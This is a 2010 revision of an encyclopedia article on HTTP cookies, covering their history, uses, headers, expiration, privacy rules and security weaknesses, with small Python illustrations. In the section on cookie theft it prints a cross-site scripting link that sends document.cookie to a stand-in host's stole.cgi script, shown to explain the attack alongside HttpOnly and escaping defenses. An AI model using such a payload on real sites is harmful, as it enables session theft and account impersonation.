
HTTP cookie: Difference between revisions

From Wikipedia, the free encyclopedia

Revision as of 16:20, 10 March 2010

A cookie (also tracking cookie, browser cookie, and HTTP cookie) is a small piece of text stored on a user's computer by a web browser. A cookie consists of one or more name-value pairs containing bits of information.

The cookie is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. A cookie can be used for authentication, session tracking (state maintenance), storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing textual data.

As text, cookies are not executable. Because they are not executed, they cannot replicate themselves and are not viruses. Due to the browser mechanism to set and read cookies, they can be used as spyware. Anti-spyware products may warn users about some cookies because cookies can be used to track people or violate privacy concerns.

Most modern browsers allow users to decide whether to accept cookies, and the time frame to keep them, but rejecting cookies makes some websites unusable.

History

The term "cookie" derives from "magic cookie", which is a packet of data a program receives and sends out again unchanged. Magic cookies were already used in computing when Lou Montulli had the idea of using them in Web communications in June 1994.[1] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.[2][3]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994,[4][5] supported cookies. The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, and US 5774670  was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.[6]

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. Some people were aware of the existence of cookies as early as the first quarter of 1995,[7] but the general public learned about them after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF was formed. Two alternative proposals for introducing state in HTTP transactions had been put forward by Brian Behlendorf and David Kristol respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies are either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was followed by RFC 2965 in October 2000.

Uses

Session management

Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"),[2][3] a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Shopping basket applications today usually store the list of basket contents in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser sends back that session identifier with each subsequent request, and the shopping basket items are stored on the server in association with that identifier.
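
As a rough illustration of a server-side basket keyed by a session identifier, the following Python sketch may help. The in-memory dictionary and the function names start_session and add_item are assumptions made for this example; a real site would more likely use a database.

```python
import secrets

# Hypothetical in-memory store mapping session identifiers to basket contents.
baskets = {}

def start_session():
    """Create a new, hard-to-guess session identifier with an empty basket."""
    session_id = secrets.token_hex(16)
    baskets[session_id] = []
    return session_id

def add_item(session_id, item):
    """Add an item to the basket tied to the identifier the browser sent back."""
    baskets[session_id].append(item)

sid = start_session()      # the value the server would place in a cookie
add_item(sid, "book")      # later requests carry the same identifier
add_item(sid, "lamp")
```

Only the identifier travels in the cookie; the basket contents stay on the server.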

Allowing users to log in to a website is a frequent use of cookies. Typically the web server will first send a cookie containing a unique session identifier. Users then submit their credentials and the web application authenticates the session and allows the user access to services.

Personalization

Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.

Many websites use cookies for personalization based on users' preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalize the page according to the user preferences. For example, the Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine allows users (even non-registered ones) to decide how many search results per page they want to see.
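
One possible way to encode preferences into a single cookie value is sketched below in Python. The preference names skin and results_per_page and the two helper functions are hypothetical; sites are free to choose any encoding.

```python
from urllib.parse import urlencode, parse_qsl

def encode_preferences(prefs):
    """Pack a dictionary of preferences into one string suitable for a cookie value."""
    return urlencode(prefs)

def decode_preferences(cookie_value):
    """Recover the preferences from the string the browser sent back."""
    return dict(parse_qsl(cookie_value))

prefs = {"skin": "monobook", "results_per_page": "50"}
value = encode_preferences(prefs)
restored = decode_preferences(value)
```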

Tracking

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referer field of the HTTP header, but cookies allow for a greater precision. This can be done for example as follows:

  1. If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
  2. From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence. For example, if the log contains some requests done using the cookie id=abc, it can be determined that these requests all come from the same user. The URL and date/time stored with the cookie allows for finding out which pages the user has visited, and at what time.
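
The two steps above can be sketched in Python as follows. This is a simplified illustration: the list named log stands in for the server's log file, and handle_request and pages_visited are hypothetical names. Unlike step 1 as described, this sketch also records the first request in the log.

```python
import secrets
from datetime import datetime, timezone

log = []  # hypothetical stand-in for the server's log file

def handle_request(url, cookie_id=None):
    """Return the cookie id for this visitor, creating one on the first visit."""
    if cookie_id is None:
        # Step 1: the request carried no cookie, so create a random string.
        cookie_id = secrets.token_hex(8)
    # Step 2: store the cookie, the requested URL and the date/time.
    log.append((cookie_id, url, datetime.now(timezone.utc)))
    return cookie_id

def pages_visited(cookie_id):
    """List the URLs requested with a given cookie, in the order they were logged."""
    return [url for cid, url, _ in log if cid == cookie_id]

uid = handle_request("/index.html")   # first visit, cookie assigned
handle_request("/spec.html", uid)     # same browser returns the cookie
handle_request("/other.html")         # a different visitor
```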

Third-party cookies and Web bugs, explained below, also allow for tracking across multiple sites. Tracking within a site is typically used to produce usage statistics, while tracking across sites is typically used by advertising companies to produce anonymous user profiles (which are then used to determine what advertisements should be shown to the user).

Tracking cookies may infringe upon the user's privacy, but they can be easily removed. Current versions of popular web browsers include options to delete 'persistent' cookies when the application is closed.

Third-party cookies

When viewing a Web page, images or other objects contained within this page may reside on servers besides just the URL shown in your browser. While rendering the page, the browser downloads all these objects. Most modern websites that you view contain information from lots of different sources. For example, if you type www.domain.com into your browser, widgets and advertisements within this page are often served from a different domain source. While this information is being retrieved, some of these sources may set cookies in your browser. First-party cookies are cookies that are set by the same domain that is in your browser's address bar. Third-party cookies are cookies being set by one of these widgets or other inserts coming from a different domain.

Modern browsers, such as Mozilla Firefox, Internet Explorer and Opera, allow third-party cookies by default, although users can change the settings to block them. Third-party cookies pose no inherent security risk (they do not harm the user's computer) and they make much of the functionality of the web possible. However, some internet users disable them because they can be used to track a user browsing from one website to another. This tracking is most often done by on-line advertising companies to assist in targeting advertisements. For example, suppose a user visits www.domain1.com and an advertiser sets a cookie in the user's browser, and then the user later visits www.domain2.com. If the same company advertises on both sites, the advertiser knows that this particular user who is now viewing www.domain2.com also viewed www.domain1.com in the past and may avoid repeating advertisements. The advertiser does not know anything more about the user than that; they do not know the user's name or address or any other personal information (unless they obtain it from another source such as from the user or by reading another cookie).

See misconceptions below for more details.

Implementation

A possible interaction between a Web browser and a server holding a Web page, in which the server sends a cookie to the browser and the browser sends it back when requesting another page.

Cookies are arbitrary pieces of data chosen by the Web server and sent to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web page or component of a Web page is an isolated event, mostly unrelated to all other views of the pages of the same site. Other than being set by a web server, cookies can also be set by a script in a language such as JavaScript, if supported and enabled by the Web browser.

Cookie specifications[8][9] suggest that browsers should be able to save and send back a minimal number of cookies. In particular, an internet browser is expected to be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain.

According to section 3.1 of RFC 2965, cookie names are case insensitive.

The cookie setter can specify a deletion date, in which case the cookie will be removed on that date. If the cookie setter does not specify a date, the cookie is removed once the user quits his or her browser. As a result, specifying a date is a way for making a cookie survive across sessions. For this reason, cookies with an expiration date are called persistent. As an example application, a shopping site can use persistent cookies to store the items users have placed in their basket. (In reality, the cookie may refer to an entry in a database stored at the shopping site, not on your computer.) This way, if users quit their browser without making a purchase and return later, they still find the same items in the basket so they do not have to look for these items again. If these cookies were not given an expiration date, they would expire when the browser is closed, and the information about the basket content would be lost.

Cookies can also be limited in scope to a specific domain, subdomain or path on the web server which created them.

Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request. For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one:

GET /index.html HTTP/1.1
Host: www.example.org

browser → server

The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
 
(content of page)

browser ← server

The server sends the line Set-Cookie only if the server wishes the browser to store a cookie. Set-Cookie is a request for the browser to store the string name=value and send it back in all future requests to the server. If the browser supports cookies and cookies are enabled, every subsequent page request to the same server will include the cookie. For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following:

GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: name=value
Accept: */*
 

browser → server

This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.
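
The exchange above can be reproduced with Python's standard http.cookies module. The sketch below is only an illustration: the variable named jar simulates the browser's storage, and no real network traffic is involved.

```python
from http.cookies import SimpleCookie

# Server side: build the Set-Cookie line for the response.
response_cookie = SimpleCookie()
response_cookie["name"] = "value"
set_cookie_line = response_cookie.output()

# Browser side (simulated): store the pair, then return it in the next request.
jar = SimpleCookie()
jar.load(set_cookie_line.split(":", 1)[1].strip())
cookie_line = "Cookie: " + "; ".join(f"{k}={m.value}" for k, m in jar.items())

# Server side: parse the Cookie header of the following request.
received = SimpleCookie()
received.load(cookie_line.split(":", 1)[1].strip())
```

The server recognises the second request as related to the first because received["name"].value matches the value it sent earlier.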

The value of a cookie can be modified by the server by sending a new Set-Cookie: name=newvalue line in response to a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair.[10] This is not the same as breadcrumb web navigation, which is the technique of showing in each page the list of pages the user has previously visited; this technique, however, may be implemented using cookies.

The Set-Cookie line is typically not created by the base HTTP server but by a CGI program. The basic HTTP server facility (e.g. Apache) just sends the result of the program (a document preceded by the header containing the cookies) to the browser.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name temperature and value 20.[11]

Example of an HTTP response from google.com, which sets a cookie with attributes.

Besides the name/value pair, a cookie may also contain an expiration date, a path, a domain name, and a flag indicating whether the cookie is intended only for encrypted connections. RFC 2965 also specifies that cookies must have a version number, but this is usually omitted. These pieces of data follow the name=newvalue pair and are separated by semicolons. For example, a cookie can be created by the server by sending a line Set-Cookie: name=newvalue; expires=date; path=/; domain=.example.org.

The domain and path tell the browser that the cookie has to be sent back to the server when requesting URLs of a given domain and path. If not specified, they default to the domain and path of the object that was requested. As a result, the domain and path strings may tell the browser to send the cookie when it normally would not. For security reasons, the cookie is accepted only if the server is a member of the domain specified by the domain string.
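
A simplified version of the check a browser might perform before sending a cookie is sketched below in Python. The function names are hypothetical, and the matching rules are deliberately reduced to a suffix test on the domain and a prefix test on the path; the actual specifications contain further restrictions.

```python
def domain_matches(host, cookie_domain):
    """True if host is the cookie domain itself or one of its subdomains."""
    host = host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)

def path_matches(request_path, cookie_path):
    """True if the requested path falls under the cookie path (simple prefix test)."""
    return request_path.startswith(cookie_path)

def should_send(host, request_path, cookie_domain, cookie_path):
    """Decide whether a stored cookie accompanies a request to host and request_path."""
    return domain_matches(host, cookie_domain) and path_matches(request_path, cookie_path)
```

For example, should_send("www.example.org", "/spec.html", ".example.org", "/") is true, while the same cookie is not sent to www.example.com.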

Cookies are actually identified by the combination of their name, domain, and path, as opposed to only their name (the original Netscape specification considers only their name and path). In other words, same name but different domains or paths identify different cookies with possibly different values. As a result, cookie values are changed only if a new value is given for the same name, domain, and path.
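
The identification rule can be pictured as a store keyed by the triple of name, domain, and path. The following Python sketch uses a plain dictionary as a hypothetical browser-side store; the cookie names and values are made up for the example.

```python
store = {}  # hypothetical browser-side cookie store

def set_cookie(name, value, domain, path):
    """Store a cookie; an existing entry is replaced only if all three keys match."""
    store[(name, domain, path)] = value

set_cookie("id", "abc", "www.example.org", "/")
set_cookie("id", "xyz", "www.example.org", "/shop")  # different path: a second cookie
set_cookie("id", "def", "www.example.org", "/")      # same triple: replaces "abc"
```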

The expiration date tells the browser when to delete the cookie. If no expiration date is provided, the cookie is deleted at the end of the user session, that is, when the user quits the browser. As a result, specifying an expiration date is a means for making cookies survive across browser sessions. For this reason, cookies that have an expiration date are called persistent.

The expiration date is specified in the "Wdy, DD-Mon-YYYY HH:MM:SS GMT" format. As an example, the following is a cookie sent by a Web server (the value string has been changed):

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net

The name of this particular cookie is RMID, while its value is the string 732423sdfs73242. The server can use an arbitrary string as the value of a cookie. The server may collapse the values of several variables into a single string, for example a=12&b=abcd&c=32. The path and domain strings / and .example.net tell the browser to send the cookie when requesting an arbitrary page of the domain .example.net, with an arbitrary path.
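
As an illustration, the example header can be taken apart with Python's standard http.cookies module, and a collapsed value can be split with urllib.parse. Treating the collapsed string as a URL-style query string is an assumption of this sketch; a server may use any encoding it likes.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

# Parse the attributes of the example cookie (header name omitted).
cookie = SimpleCookie()
cookie.load("RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; "
            "path=/; domain=.example.net")
morsel = cookie["RMID"]

# Split a value that collapses several variables into one string.
variables = parse_qs("a=12&b=abcd&c=32")
```

Here morsel.value holds the value string, while morsel["expires"], morsel["path"] and morsel["domain"] hold the attributes.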

Expiration

Cookies expire, and are therefore not sent by the browser to the server, under any of these conditions:

  1. At the end of the user session (i.e. when the browser is shut down) if the cookie is not persistent
  2. An expiration date has been specified, and has passed
  3. The expiration date of the cookie is changed (by the server or the script) to a date in the past
  4. The browser deletes the cookie by user request

The third condition allows a server or script to explicitly delete a cookie. Note that the browser doesn't send to the server information about cookie lifetime, so there is no way for the server to check if the cookie expires soon.
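
A minimal Python sketch of the date-based conditions follows. The helper names is_expired and deletion_header are hypothetical, and the path=/ in the deletion line is an assumption: in practice the path and domain must match those of the cookie being removed.

```python
from datetime import datetime, timezone

DATE_FORMAT = "%a, %d-%b-%Y %H:%M:%S GMT"

def is_expired(expires, now):
    """expires is the attribute string, or None for a non-persistent cookie."""
    if expires is None:
        return False  # kept until the browser is shut down
    when = datetime.strptime(expires, DATE_FORMAT).replace(tzinfo=timezone.utc)
    return when <= now

def deletion_header(name):
    """Build a Set-Cookie line with a date in the past, asking the browser to drop the cookie."""
    return f"Set-Cookie: {name}=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/"
```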

Misconceptions

Since their introduction on the Internet, misconceptions about cookies have circulated on the Internet and in the media.[12][13] In 1998, CIAC, a computer incident response team of the United States Department of Energy, found the security vulnerability "essentially nonexistent" and explained that "information about where you come from and what web pages you visit already exists in a web server's log files".[14] In 2005, Jupiter Research published the results of a survey,[15] according to which a consistent percentage of respondents believed some of the following false claims:

Cookies cannot erase or read information from the user's computer.[16] However, cookies allow for detecting the Web pages viewed by a user on a given site or set of sites. This information can be collected in a profile of the user. Some profiles are anonymous, meaning they contain no personal information, yet even such profiles can be controversial.[citation needed]

According to the same survey, a large percentage of Internet users do not know how to delete cookies. One reason people do not trust the concept of cookies is that some sites have abused the personal identification aspect of cookies and have shared them. A large percentage of targeted advertising comes from information gleaned from tracking cookies.

Browser settings

Most modern browsers support cookies and allow the user to disable them. The following are common options:[17]

  1. To enable or disable cookies completely, so that they are always accepted or always blocked.
  2. To allow the user to see the cookies that are active with respect to a given page by typing javascript:alert(document.cookie) in the browser URL field. Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.[18][19][20][21]

Privacy and third-party cookies

Cookies have some important implications on the privacy and anonymity of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain, a Web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. This includes cookies from unwanted pop-up ads.

In this fictional example, an advertising company has placed banners in two Web sites. Hosting the banner images on its servers and using third-party cookies, the advertising company is able to track the browsing of users across these two sites.

Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.

The possibility of building a profile of users is considered by some a potential privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

The United States government set strict rules on setting cookies in 2000, after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers which had visited its web site. When notified it was violating policy, the CIA stated that these cookies were not intentionally set and stopped setting them.[22] On December 25, 2005, Brandt discovered that the National Security Agency had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the National Security Agency immediately disabled the cookies.[23]

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies.[24] In particular, Article 5, Paragraph 3 of this directive mandates that storing data (like cookies) in a user's computer can only be done if:

  1. the user is provided information about how this data is used;
  2. the user is given the possibility of denying this storing operation.

However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.

The P3P specification includes the possibility for a server to state a privacy policy, which specifies which kind of information it collects and for which purpose. These policies include (but are not limited to) the use of information gathered using cookies. According to the P3P specification, a browser can accept or reject cookies by comparing the privacy policy with the stored user preferences or ask the user, presenting them the privacy policy as declared by the server.

Many web browsers, including Apple's Safari and Microsoft Internet Explorer versions 6 and 7, support P3P, which allows the web browser to determine whether to allow third-party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains.[25] Firefox 2.x dropped this option from its menu system but restored it with the release of version 3.x.

Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's Web experience.[26] Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.[27]

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are at odds with the Representational State Transfer (REST) software architectural style.[28]

Inaccurate identification

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

A cookie can be stolen by another computer that is allowed reading from the network

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver (particularly on unencrypted public Wi-Fi networks). This traffic includes cookies sent on ordinary unencrypted http sessions. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

This issue can be overcome by securing the communication between the user's computer and the server by employing Transport Layer Security (https protocol) to encrypt the connection. A server can specify the secure flag while setting a cookie; the browser will then send it only over a secure channel, such as an SSL connection.[29]
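
For illustration, the secure flag can be set with Python's standard http.cookies module as shown below. The cookie name session and its value are made up for the example.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"        # hypothetical session token
cookie["session"]["secure"] = True  # ask the browser to send it only over a secure channel
header = cookie.output()
```

The resulting header line ends with the Secure attribute.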

However a large number of websites, although using encrypted https communication for user authentication (i.e. the login page), subsequently send session cookies and other data over ordinary, unencrypted http connections for performance reasons. Attackers can therefore easily intercept the cookies of other users and impersonate them on the relevant websites[30] or use them in a cookiemonster attack.

Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

A different way to steal cookies is cross-site scripting and making the browser itself send cookies to malicious servers that should not receive them. Modern browsers allow execution of pieces of code retrieved from the server. If cookies are accessible during execution, their value may be communicated in some form to servers that should not access them. Encrypting cookies before sending them on the network does not help against this attack.[31]

This type of cross-site scripting is typically exploited by attackers on sites that allow users to post HTML content. By embedding a suitable piece of code in an HTML post, an attacker may receive cookies of other users. Knowledge of these cookies can then be exploited by connecting to the same site using the stolen cookies, thus being recognised as the user whose cookies have been stolen.

One way to prevent such attacks is to use the HttpOnly flag;[32] this is an option, first introduced by Microsoft in Internet Explorer version 6[33] and implemented in PHP since version 5.2.0,[34] that is intended to make a cookie inaccessible to client-side script. However, web developers should consider developing their websites so that they are immune to cross-site scripting.[35]
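
As a sketch of how a server-side program might request this behaviour, Python's standard http.cookies module exposes the flag as a cookie attribute. The cookie name and value here are hypothetical.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"          # hypothetical session token
cookie["session"]["httponly"] = True  # hide the cookie from client-side script
header = cookie.output()
```

A browser that honours the flag still returns the cookie to the server, but does not expose it through document.cookie.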

Another potential security threat involving cookies is cross-site request forgery.

Cookie poisoning: an attacker sends a server an invalid cookie, possibly modifying a valid cookie it previously received from the server.

The cookie specifications constrain cookies to be sent back only to the servers in the same domain as the server from which they originate. However, the value of cookies can be sent to other servers using means different from the Cookie header.

In particular, scripting languages such as JavaScript and JScript are usually allowed to access cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. These facts are used in combination with sites allowing users to post HTML content that other users can see.

As an example, an attacker running the domain example.com may post a comment containing the following link to a popular blog they do not otherwise control:

<a href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the example.com server, and the attacker is then able to collect the cookies of other users.

This type of attack is difficult to detect on the user side because the script is coming from the same domain that has set the cookie, and the operation of sending the value appears to be authorised by this domain. It is usually considered the responsibility of the administrators running sites where users can post to disallow the posting of such malicious code.
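One way a site can disallow such posts is to escape user-supplied text before placing it in a page, so that it is displayed as text rather than interpreted as markup. The following is a minimal sketch, assuming comments are plain text with no permitted HTML; render_comment is a hypothetical helper, not part of any particular blog software.

```python
import html


def render_comment(user_text: str) -> str:
    """Return user-supplied text escaped for inclusion in an HTML page."""
    # html.escape replaces &, <, > and (with quote=True) both quote characters,
    # so the browser shows the text instead of parsing it as tags or attributes.
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


# The malicious link from the example above, as an attacker might post it.
posted = (
    '<a href="#" onclick="window.location='
    "'http://example.com/stole.cgi?text='"
    '+escape(document.cookie); return false;">Click here!</a>'
)

safe = render_comment(posted)
print(safe)
```

Sites that do allow some HTML in posts need a more careful filter than this; escaping everything is simply the easiest case to get right.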

Cookies are not directly visible to client-side programs such as JavaScript if they have been sent with the HttpOnly flag. From the point of view of the server, the only difference from the normal case is that a new field containing the string HttpOnly is added to the Set-Cookie header line:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net; HttpOnly

When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts.[32] The HttpOnly flag is not part of any standard, and is not implemented in all browsers. Note that there is currently no prevention of reading or writing the session cookie via an XMLHttpRequest.[36]
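On the server side, adding the field is typically a one-line change. The sketch below reuses the cookie name, value, path and domain from the header shown above and sets the flag with Python's standard http.cookies module; the attribute order in the generated line may differ from the example, which does not affect its meaning.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["RMID"] = "732423sdfs73242"
cookie["RMID"]["path"] = "/"
cookie["RMID"]["domain"] = ".example.net"
# Mark the cookie as unavailable to client-side scripts.
cookie["RMID"]["httponly"] = True

http_only_header = cookie.output()
print(http_only_header)
```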

While cookies are supposed to be stored and sent back to the server unchanged, an attacker may modify the value of cookies before sending them back to the server. If, for example, a cookie contains the total value a user has to pay for the items in their shopping basket, changing this value exposes the server to the risk of charging the attacker less than the actual price. The process of tampering with the value of cookies is called cookie poisoning, and is sometimes used after cookie theft to make an attack persistent.

In cross-site cooking, the attacker exploits a browser bug to send an invalid cookie to a server.

Most websites, however, store only a session identifier — a randomly generated unique number used to identify the user's session — in the cookie itself, while all the other information is stored on the server. In this case, the problem of cookie poisoning is largely eliminated.
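The session-identifier approach can be sketched as follows. This is an illustration under stated assumptions, not a production design: SESSIONS is a hypothetical in-memory stand-in for a server-side store, and create_session and add_to_cart are made-up helper names.

```python
import secrets

# Hypothetical in-memory store; a real site would use a database or cache.
SESSIONS = {}


def create_session() -> str:
    """Create server-side state and return the identifier to put in the cookie."""
    session_id = secrets.token_urlsafe(32)  # random and hard to guess
    SESSIONS[session_id] = {"cart_total": 0}
    return session_id


def add_to_cart(session_id: str, price: int) -> int:
    """Update the total held on the server; the cookie carries only the ID."""
    session = SESSIONS.get(session_id)
    if session is None:
        raise KeyError("unknown session")
    session["cart_total"] += price
    return session["cart_total"]
```

Because the total lives on the server, editing the cookie can at most turn a valid identifier into an unknown one, which the server rejects.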

Cross-site cooking

Each site is supposed to have its own cookies, so a site like example.com should not be able to alter or set cookies for another site, like example.org. Cross-site cooking vulnerabilities in web browsers allow malicious sites to break this rule. This is similar to cookie poisoning, but the attacker exploits non-malicious users with vulnerable browsers, instead of attacking the actual site directly. The goal of such attacks may be to perform session fixation.

Users are advised to use the more recent versions of web browsers in which such issues are mitigated.
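The rule that a site may only set cookies for its own domain can be illustrated with a simplified check. This is a sketch only: the function name domain_matches is hypothetical, and real browsers apply further rules (for example, rejecting cookies set for top-level suffixes such as .com) that are omitted here.

```python
def domain_matches(host: str, cookie_domain: str) -> bool:
    """Simplified test of whether a cookie's domain covers the given host."""
    host = host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    # Accept an exact match, or a host that is a subdomain of the cookie domain.
    # Requiring the leading dot prevents "badexample.com" matching "example.com".
    return host == cookie_domain or host.endswith("." + cookie_domain)


print(domain_matches("www.example.net", ".example.net"))
print(domain_matches("example.org", "example.com"))
```

A cross-site cooking bug is, in effect, a case where the browser's version of this check accepts a domain it should have refused.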

Inconsistent state on client and server

The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is realized using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item to the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations.

Persistent cookies have been criticized by privacy experts for not being set to expire soon enough, and thereby allowing websites to track users and build up a profile of them over time.[37] This aspect of cookies also compounds the issue of session hijacking, because a stolen persistent cookie can potentially be used to impersonate a user for a considerable period of time.

Alternatives to cookies

Some of the operations that can be realized using cookies can also be realized using other mechanisms.

IP address

Users may be tracked based on the IP address of the computer requesting the page. This technique has been available since the introduction of the World Wide Web, as downloading pages requires the server to know the IP address of the computer running the browser or the proxy, if any is used. The server can track this information whether or not cookies are used. However, these addresses are typically less reliable in identifying a user than cookies because computers and proxies may be shared by several users, and the same computer may be assigned different IP addresses in different work sessions (as is often the case for dial-up connections).

Tracking by IP addresses can be reliable in some situations, such as the case of always-on broadband connections which retain the same IP address for long periods of time, so long as the power stays on.

Some systems such as Tor are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.

URL (query string)

A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.

This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.
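The link-rewriting step might look like the sketch below, which uses Python's standard urllib.parse module. The function name add_session_to_link and the parameter name sid are assumptions made for the example; real frameworks choose their own names.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def add_session_to_link(url: str, session_id: str, param: str = "sid") -> str:
    """Return url with the session identifier appended to its query string."""
    parts = urlsplit(url)
    # Keep existing parameters, dropping any stale copy of the session parameter.
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k != param]
    query.append((param, session_id))
    return urlunsplit(parts._replace(query=urlencode(query)))


print(add_session_to_link("http://example.com/cart?item=3", "abc123"))
```

The server would apply such a function to every link in a page before sending it, so that whichever link the user follows carries the identifier back.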

